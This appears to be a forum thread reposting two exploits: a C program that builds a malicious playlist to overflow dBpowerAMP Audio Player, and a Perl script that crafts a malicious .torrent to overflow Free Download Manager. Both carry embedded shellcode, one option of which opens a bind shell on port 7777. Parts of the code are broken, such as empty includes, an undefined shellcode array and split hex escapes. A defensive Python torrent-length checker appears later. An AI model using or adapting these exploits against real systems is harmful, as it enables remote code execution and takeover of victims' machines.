    Target: dBpowerAMP Audio Player 2
    Impact: Arbitrary code execution

    Vulnerability description:

    * Remote arbitrary code execution in dBpowerAMP Audio Player

    Exploit code:

    * dBpowerAMP-expl.c

    /*
    * simo36.c
    * CODED By SimO-s0fT (Morrocco-->marrakesh city)
    * Home : Exploiter-ma.com
    * e-mail: maroc-anti-connexion[at]hotmail.com[dot]com
    *greetz : Stack & Djekmani4ever & alphanix & all friends
    * dBpowerAMP Audio Player local buffer overflow exploit
    *
    * this feat was exploit windows trus sp2
    * there is a small problem on the farm but fortunately I managed to use it
    * and remember that this feat has been operating as trus win
    * I test and winxp sp1 I found another problem
    * example:
    &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
    &&&&& G:\Documents and Settings\SimO\Bureau>simo simo36.pls &&&&&
    &&&&& ################################################################ &&&&&
    &&&&& dBpowerAMP Audio Player local buffer overflow exploit &&&&&
    &&&&& Coded By SimO-s0fT &&&&&
    &&&&& e-mail : simo[at]exploiter-ma[dot]com &&&&&
    &&&&& ################################################################ &&&&&
    &&&&& USAGE : simo36.exe simo.pls &&&&&
    &&&&& [1] execute calc.exe &&&&&
    &&&&& [2] execute bindshell LPORT=7777 &&&&&
    &&&&& ################################################################ &&&&&
    &&&&& enter 2 &&&&&
    &&&&& created !! &&&&&
    &&&&& openit with dBpowerAMP &&&&&
    &&&&& &&&&&
    &&&&& G:\Documents and Settings\SimO>telnet 127.0.0.1 7777 &&&&&
    &&&&& Microsoft Windows XP [version 5.1.2600] &&&&&
    &&&&& Microso© Copyright 1985-2001 Microsoft Corp. &&&&&
    &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
    */
    #include
    #include
    #include
    #include
    #define OFFSET 257
    char header[]=
    "\x5b\x70\x6c\x61\x79\x6c\x69\x73\x74\x5d\x0d\x0d\x4e\x75\x6d\x62"
    "\x65\x72\x4f\x66\x45\x6e\x74\x72\x69\x65\x73\x3d\x31\x0d\x0d\x46"
    "\x69\x6c\x65\x31\x3d\x68\x74\x74\x70\x3a\x2f\x2f";
    // calc
    // bind shell 7777
    char scode2[] =
    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
    "\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x61"
    "\x58\x30\x42\x31\x50\x42\x41\x6b\x41\x41\x71\x32\x41\x42\x41\x32"
    "\x42\x41\x30\x42\x41\x58\x38\x41\x42\x50\x75\x6d\x39\x4b\x4c\x32"
    "\x4a\x5a\x4b\x50\x4d\x6d\x38\x6b\x49\x49\x6f\x59\x6f\x39\x6f\x35"
    "\x30\x6c\x4b\x70\x6c\x65\x74\x37\x54\x4c\x4b\x42\x65\x47\x4c\x6e"
    "\x6b\x31\x6c\x46\x65\x33\x48\x43\x31\x48\x6f\x6c\x4b\x70\x4f\x65"
    "\x48\x6c\x4b\x73\x6f\x35\x70\x37\x71\x38\x6b\x31\x59\x4c\x4b\x46"
    "\x54\x6e\x6b\x53\x31\x58\x6e\x30\x31\x6f\x30\x4f\x69\x4e\x4c\x4b"
    "\x34\x49\x50\x41\x64\x46\x67\x49\x51\x7a\x6a\x46\x6d\x43\x31\x48"
    "\x42\x5a\x4b\x38\x74\x47\x4b\x30\x54\x64\x64\x51\x38\x42\x55\x4b"
    "\x55\x4e\x6b\x53\x6f\x51\x34\x43\x31\x4a\x4b\x50\x66\x4e\x6b\x46"
    "\x6c\x42\x6b\x4c\x4b\x73\x6f\x75\x4c\x33\x31\x5a\x4b\x65\x53\x34"
    "\x6c\x6e\x6b\x6d\x59\x30\x6c\x57\x54\x55\x4c\x55\x31\x4b\x73\x74"
    "\x71\x69\x4b\x65\x34\x6e\x6b\x43\x73\x74\x70\x6c\x4b\x67\x30\x46"
    "\x6c\x6c\x4b\x70\x70\x67\x6c\x6e\x4d\x6c\x4b\x57\x30\x44\x48\x71"
    "\x4e\x72\x48\x4e\x6e\x50\x4e\x54\x4e\x38\x6c\x70\x50\x4b\x4f\x4e"
    "\x36\x71\x76\x41\x43\x31\x76\x31\x78\x76\x53\x30\x32\x53\x58\x30"
    "\x77\x44\x33\x57\x42\x63\x6f\x70\x54\x6b\x4f\x48\x50\x73\x58\x58"
    "\x4b\x58\x6d\x6b\x4c\x57\x4b\x70\x50\x6b\x4f\x6a\x76\x71\x4f\x6d"
    "\x59\x4b\x55\x65\x36\x6c\x41\x68\x6d\x53\x38\x63\x32\x42\x75\x51"
    "\x7a\x36\x62\x59\x6f\x58\x50\x71\x78\x4a\x79\x34\x49\x4b\x45\x6e"
    "\x4d\x30\x57\x69\x6f\x4e\x36\x52\x73\x41\x43\x62\x73\x76\x33\x51"
    "\x43\x70\x43\x43\x63\x73\x73\x36\x33\x6b\x4f\x4a\x70\x75\x36\x41"
    "\x78\x75\x4e\x71\x71\x35\x36\x42\x73\x4b\x39\x79\x71\x6c\x55\x70"
    "\x68\x4f\x54\x75\x4a\x32\x50\x39\x57\x52\x77\x69\x6f\x38\x56\x70"
    "\x6a\x72\x30\x50\x51\x53\x65\x4b\x4f\x58\x50\x55\x38\x6c\x64\x4c"
    "\x6d\x34\x6e\x49\x79\x66\x37\x6b\x4f\x4e\x36\x50\x53\x30\x55\x69"
    "\x6f\x4a\x70\x53\x58\x7a\x45\x41\x59\x4e\x66\x37\x39\x36\x37\x69"
    "\x6f\x59\x46\x72\x70\x50\x54\x31\x44\x33\x65\x4b\x4f\x5a\x70\x4f"
    "\x63\x51\x78\x38\x67\x50\x79\x38\x46\x43\x49\x32\x77\x4b\x4f\x4b"
    "\x66\x62\x75\x79\x6f\x6a\x70\x45\x36\x30\x6a\x52\x44\x30\x66\x41"
    "\x78\x32\x43\x72\x4d\x6f\x79\x6d\x35\x62\x4a\x42\x70\x70\x59\x74"
    "\x69\x5a\x6c\x6c\x49\x6b\x57\x41\x7a\x32\x64\x6b\x39\x68\x62\x30"
    "\x31\x6f\x30\x6b\x43\x6e\x4a\x6b\x4e\x51\x52\x34\x6d\x49\x6e\x62"
    "\x62\x36\x4c\x5a\x33\x6c\x4d\x71\x6a\x65\x68\x6e\x4b\x4c\x6b\x4e"
    "\x4b\x55\x38\x30\x72\x59\x6e\x4c\x73\x37\x66\x4b\x4f\x30\x75\x63"
    "\x74\x39\x6f\x6e\x36\x33\x6b\x36\x37\x72\x72\x31\x41\x31\x41\x46"
    "\x31\x50\x6a\x55\x51\x31\x41\x41\x41\x32\x75\x42\x71\x39\x6f\x48"
    "\x50\x50\x68\x6c\x6d\x39\x49\x45\x55\x78\x4e\x30\x53\x39\x6f\x6b"
    "\x66\x62\x4a\x79\x6f\x39\x6f\x47\x47\x39\x6f\x58\x50\x4e\x6b\x50"
    "\x57\x4b\x4c\x6c\x43\x4b\x74\x70\x64\x6b\x4f\x6a\x76\x41\x42\x49"
    "\x6f\x58\x50\x30\x68\x68\x6f\x6a\x6e\x4b\x50\x31\x70\x42\x73\x49"
    "\x6f\x58\x56\x49\x6f\x78\x50\x61";
    int main(int argc,char *argv[]){
    FILE *openfile;
    unsigned char *buffer;
    unsigned int RET=0x7c85d568;
    unsigned int offset=0;
    int number=0;

    printf("################################################################\n");
    printf(" dBpowerAMP Audio Player local buffer overflow exploit\n");
    printf("\tCoded By SimO-s0fT\n");
    printf("e-mail : simo[at]exploiter-ma[dot]com\n");
    printf("################################################################\n");
    printf("USAGE : simo36.exe simo.pls\n");
    printf("[1] execute calc.exe\n");
    printf("[2] execute bindshell LPORT=7777\n");
    printf("################################################################\n");
    system("color 04");
    sleep(2000);
    printf("enter");
    scanf("%d",&number);
    if((openfile=fopen(argv[1],"wb"))==NULL){
    perror("cannot opening file xD");
    exit(0);
    }
    switch(number){
    case 1:
    buffer = (unsigned char *) malloc (OFFSET + sizeof(RET) + strlen(scode1));
    memset(buffer,0x90,OFFSET + sizeof(RET) + strlen(scode1));
    offset=OFFSET;
    memcpy(buffer+offset,&RET,sizeof(RET)-1);
    offset+=sizeof(RET);
    memcpy(buffer+offset,scode1,strlen(scode1));
    offset+=strlen(scode1);
    fputs(header,openfile);
    fputs(buffer,openfile);
    fclose(openfile);
    printf("created !!\nopenit with dBpowerAMP");
    break;

    case 2:
    buffer = (unsigned char *) malloc ( OFFSET + sizeof(RET) + strlen(scode2));
    memset(buffer,0x90, OFFSET + sizeof(RET) + strlen(scode2));
    offset=OFFSET;
    memcpy(buffer+offset,&RET,sizeof(RET));
    offset+=sizeof(RET);
    memcpy(buffer+offset,scode2,strlen(scode2));
    offset+=strlen(scode2);
    fputs(header,openfile);
    fputs(buffer,openfile);
    fclose(openfile);
    printf("created !!\n openit with dBpowerAMP");
    break;
    }
    free(buffer);
    return 0;
    }

     
    aka_kludge, Date: Monday, 16.02.2009, 09:33 | Message # 11
    Free Download Manager <= 3.0 Build 844 .torrent BOF Exploit

    February 4, 2009

    Target: Free Download Manager 3.0 Build 844 and earlier versions
    Impact: Arbitrary code execution

    Vulnerability description:

    * Multiple vulnerabilities in Free Download Manager

    Exploit code:

    * Free-Download-Manager-expl.pl

    #!/usr/bin/perl
    #
    # Free Download Manager <= 3.0 Build 844 .torrent BOF Exploit
    # -----------------------------------------------------------
    # Exploit by SkD (skdrat@hotmail.com)
    #
    # Vendors URL =
    # [www.freedownloadmanager.org]
    # Download FDM 3.0 Build 844 =
    # [http://www.download.com/Free-Download-Manager/3000-2071_4-10301621.html]
    # (Downloaded by over 1.6 million users!)
    #
    # This is another one of the more advanced exploitation methods
    # for buffer overflows using my method called "shell building".
    # It utilizes a SEH overflow and then a shellcode builder/assembler
    # "builds"/or "assembles" bytes that were deleted by transformation
    # of the buffer so that the shellcode will work without a flaw.
    # I have been able to do this because of my recent experiences with
    # UNICODE based overflows (heap & stack). This is a demonstration
    # of how you can obtain power with limitations to buffer.
    # Of course I could have used my shellhunting technique,
    # but this is a new method, and to demonstrate it in a world of
    # dying buffer overflows is important for me.
    #
    # Unfortunately I did not have time to make this a universal exploit
    # so it will only work on all NT systems EXCEPT Vista (due to randomized
    # heap, etc). But with a few modifications it can work (sure of it).
    # Read my notes & comments in the script for more info.
    #
    # Tested on Windows XP SP3 (Fully Patched) & Windows 2000 SP4.
    #
    # Note: Author has no responsibility over the damage you do with this!

    use strict;
    use warnings;

    my $tdata1 = "\x64\x38\x3A\x61\x6E\x6E\x6F\x75\x6E\x63\x65\x31\x32\x3A\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x37\x3A\x63\x6F\x6D".
    "\x6D\x65\x6E\x74\x31\x32\x3A\x63\x6F\x6D\x6D\x65\x6E\x74\x74\x74\x74\x74\x74\x31\x33\x3A\x63\x72\x65\x61\x74\x69\x6F\x6E\x20".
    "\x64\x61\x74\x65\x69\x31\x32\x33\x33\x36\x31\x36\x35\x30\x37\x65\x34\x3A\x69\x6E\x66\x6F\x64\x36\x3A\x6C\x65\x6E\x67\x74\x68".
    "\x69\x39\x31\x37\x33\x34\x65\x34\x3A\x6E\x61\x6D\x65\x31\x32\x39\x39\x39\x3A";
    my $tdata2 = "\x31\x32\x3A\x70\x69\x65\x63\x65\x20\x6C\x65\x6E\x67\x74\x68\x69\x32\x36\x32\x31\x34\x34\x65\x36\x3A\x70\x69\x65\x63\x65\x73".
    "\x32\x30\x3A\x10\x7F\xD5\x50\xE2\x70\xA5\x80\x61\x42\x7B\x53\x08\xE0\xCE\xFE\x9C\xDA\x2E\xE1\x65\x65";

    # win32_exec - EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
    my $shellcode =
    "\x01\xeb\x03\x59\x01\xeb\x05\x01\xe8\x01\xf8\x01\xff\x01\xff\x01\xff\x4f\x49\x49\x49\x49\x49".
    #Notice I added 0x01 byte before each 0x80=> byte.
    "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
    "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x3 4".
    "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
    "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34" .
    "\x42\x30\x42\x50\x42\x30\x4b\x58\x45\x44\x4e\x43\x4b\x38\x4e\x47".
    "\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x51\x4b\x38".
    " \x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x54\x4b\x38\x46\x53\x4b\x48".
    "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c".
    "\x 46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e".
    "\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x57\x45\x4e\x4b\x48".
    "\x4f \x35\x46\x32\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".
    "\x4b\x48\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x58".
    "\x41\x 30\x4b\x4e\x49\x48\x4e\x55\x46\x52\x46\x50\x43\x4c\x41\x33".
    "\x42\x4c\x46\x36\x4b\x48\x42\x34\x42\x53\x45\x58\x42\x4c\x4a\x37".
    "\x4e\x50 \x4b\x58\x42\x34\x4e\x30\x4b\x58\x42\x57\x4e\x31\x4d\x4a".
    "\x4b\x58\x4a\x46\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".
    "\x42\x50\x 42\x30\x42\x30\x4b\x58\x4a\x36\x4e\x53\x4f\x35\x41\x53".
    "\x48\x4f\x42\x36\x48\x35\x49\x38\x4a\x4f\x43\x38\x42\x4c\x4b\x37".
    "\x42\x35\x4a \x36\x50\x47\x4a\x4d\x44\x4e\x43\x37\x4a\x56\x4a\x59".
    "\x50\x4f\x4c\x48\x50\x30\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x56".
    "\x4e\x36\x43\x 46\x42\x30\x5a";

    #This is the shellcode builder or assembler. It gets the location of the shellcode and then from there does
    #the appropriate modifications to apply the correct hex bytes that were deleted off the buffer (0x80=> bytes).
    #You can only use the Alpha numerical shellcodes for the Shellcode builder ;), but remember to add
    #0x01 before each 0x80=> byte.
    my $shellcode_builder = ("\x59" x 3 ."\x40" x 9 . "\x51\x5b"."\x4b" x 4 ."\x01\x03"."\x48" x 10 ."\x43\x01\x03" x 3).
    ("\x4b" x 3 ."\x03\x0b" x 35 ."\x41" x 14 ."\x41\x01\x01\x01\x01"."\x41\x01\x01" x 2).
    ("\x49" x 3 ."\x48"."\x01\x01" x 5 ."\x40" x 3 ."\x01\x01\x41\x01\x01").
    ("\x49" x 2 ."\x48" x 3 ."\x01\x01" x 13 ."\x40" x 3 ."\x01\x01\x41\x01\x01").
    ("\x49" x 3 ."\x48" x 3 ."\x01\x01" x 11 ."\x49" x 3 ."\x01\x01" x 11).
    ("\x40" x 3 ."\x41\x01\x01"."\x41" x 3 ."\x01\x01"."\x41" x 6 ."\x01\x01");
    my $len = 12999 - (10000 + (350 - length($shellcode_builder)) + length($shellcode) + 12 + length($shellcode_builder)); #Really important calculation to overflow the stack #and set everything in the right places(ret,addr,etc).
    my $shellcode_builder_label = "\x01\x01\x01\x01"; #Used as a 'label' to create a DWORD 0x0000000a used in a calculation to get shellcode location.
    my $overflow1 = "\x41" x 10000;
    my $overflow2 = "\x41" x $len;
    my $sled = "\x41" x (350 - length($shellcode_builder));
    my $sehjmp = "\x71\x06\x01\x01"; #Since we cannot use 0xEB, I am going to use another type of jump
    my $sehret = "\x1a\x09\x03\x10"; #0x1003091A fumcore.dll POP ESI, POP EDI, RETN (For XP <= Systems)

    open(my $torrent, "> s.torrent");
    print $torrent $tdata1.
    $overflow1.$shellcode_builder_label.$sehjmp.$sehret.$shellcode_builder.$sled.$shellcode.$overflow2.
    $tdata2;
    close $torrent;
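
For triage of inbound .torrent files, the layout that `$tdata1` in the post above encodes (an `info` dictionary whose `name` string declares 12999 bytes) can be caught by a bencode walker that checks each declared string length against a per-key limit. This is an added example, not part of the original post or of Free Download Manager; the limits and the names `triage` and `sample_torrent` are assumptions, and the sample file is constructed with filler bytes.

```python
# Added example; the limits are assumptions, not values taken from FDM.
MAX_LEN = {b"name": 255, b"announce": 2048, b"comment": 4096}
DEFAULT_MAX = 1 << 20  # assumed cap for other strings such as "pieces"

def _str_header(data, pos):
    """Parse '<len>:' at pos; return (declared_len, payload_start)."""
    colon = data.find(b":", pos)
    if colon < 0 or not data[pos:colon].isdigit():
        raise ValueError(f"bad string header at offset {pos}")
    return int(data[pos:colon]), colon + 1

def _scan(data, pos, key, findings):
    """Walk one bencoded value; return the offset just past it."""
    tag = data[pos:pos + 1]
    if tag == b"i":                      # integer: i<digits>e
        end = data.find(b"e", pos)
        if end < 0:
            raise ValueError("unterminated integer")
        return end + 1
    if tag in (b"l", b"d"):              # list or dictionary
        pos += 1
        while data[pos:pos + 1] != b"e":
            if pos >= len(data):
                raise ValueError("unterminated container")
            if tag == b"d":              # a dictionary key names the next value
                n, start = _str_header(data, pos)
                key, pos = data[start:start + n], start + n
            pos = _scan(data, pos, key, findings)
        return pos + 1
    n, start = _str_header(data, pos)    # byte string: <len>:<payload>
    if n > MAX_LEN.get(key, DEFAULT_MAX):
        findings.append((key, n, "over limit"))
    if start + n > len(data):
        raise ValueError(f"string at offset {pos} exceeds file size")
    return start + n

def triage(data):
    """Return [(key, declared_len, reason)] for the bytes of one .torrent."""
    findings = []
    try:
        _scan(data, 0, None, findings)
    except (ValueError, RecursionError) as exc:  # malformed or too deeply nested
        findings.append((None, 0, str(exc)))
    return findings

def sample_torrent(name_len):
    """Constructed sample following the field layout of the post's file."""
    head = b"d8:announce12:AAAAAAAAAAAA4:infod6:lengthi91734e4:name%d:" % name_len
    return head + b"A" * name_len + b"12:piece lengthi262144e6:pieces20:" + b"\0" * 20 + b"ee"
```

A parse error is reported as a finding with key `None`, so a truncated or malformed file is flagged rather than silently skipped.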

     
    aka_kludge, Date: Wednesday, 27.05.2009, 08:48 | Message # 12
    cool
     